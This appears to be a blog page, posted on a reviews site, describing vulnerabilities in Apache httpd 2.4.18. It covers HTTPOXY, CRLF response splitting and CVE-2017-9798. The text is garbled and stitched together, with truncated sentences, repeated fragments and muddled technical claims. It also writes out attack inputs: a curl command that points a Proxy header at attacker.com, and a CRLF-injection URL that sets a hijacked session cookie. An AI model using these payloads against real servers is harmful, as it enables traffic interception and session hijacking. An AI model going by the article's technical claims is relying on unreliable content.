BiboZ-ification Nation

Movie reviews, music album reviews, short stories, poetry and other mayhem

Apache Httpd 2.4.18 Exploit Online

CVE-2016-5387, nicknamed "HTTPOXY," is a misnomer. It is not an Apache bug per se, but a design flaw in how CGI scripts handled the Proxy header. An attacker could send a request containing a Proxy: http://evil.com header, tricking server-side scripts (PHP, Python, Go) into routing outgoing HTTP requests through a malicious proxy.

This required specific configurations: mod_rewrite with rules that reflected user input into the Location or Set-Cookie headers without sanitization.

curl -H "Proxy: http://attacker.com:8080" http://target/cgi-bin/api.php If api.php called an external service, the attacker could intercept or modify the response. apache httpd 2.4.18 exploit

Introduction In the world of web server security, version numbers often become shorthand for critical vulnerabilities. For system administrators and penetration testers, Apache HTTP Server 2.4.18 holds a particular, albeit complex, place in the collective memory. Released in December 2015, this version was the standard on several long-term support (LTS) Linux distributions, most notably Ubuntu 16.04 LTS (Xenial Xerus) .

For security researchers: Focus on . For sysadmins: Upgrade or virtualize . Apache 2.4.18 has reached end-of-life; running it today is a risk not because of a single magic exploit, but because of the cumulative burden of two dozen minor-to-moderate CVEs. CVE-2016-5387, nicknamed "HTTPOXY," is a misnomer

A viable information disclosure tool, but not a remote shell exploit . Searches for an "apache 2.4.18 shell exploit" due to HTTPOXY are misguided. 2. CVE-2016-4975: CRLF Injection & HTTP Response Splitting Severity: 6.1 (Medium) Type: CRLF Injection

CVE-2017-9798, discovered by Hanno Böck, was a use-after-free vulnerability in mod_http2 . When Apache 2.4.18 was compiled with HTTP/2 support (not default in 2.4.18, but common), an attacker could trigger a memory leak. The leak disclosed the contents of the server’s memory, potentially including htaccess directives, private keys, or session data. potentially including htaccess directives

http://target.com/login?next=/%0d%0aSet-Cookie:%20session=hijacked If the server responded with a Location: /next header containing the unsanitized value, the attacker could inject a second header.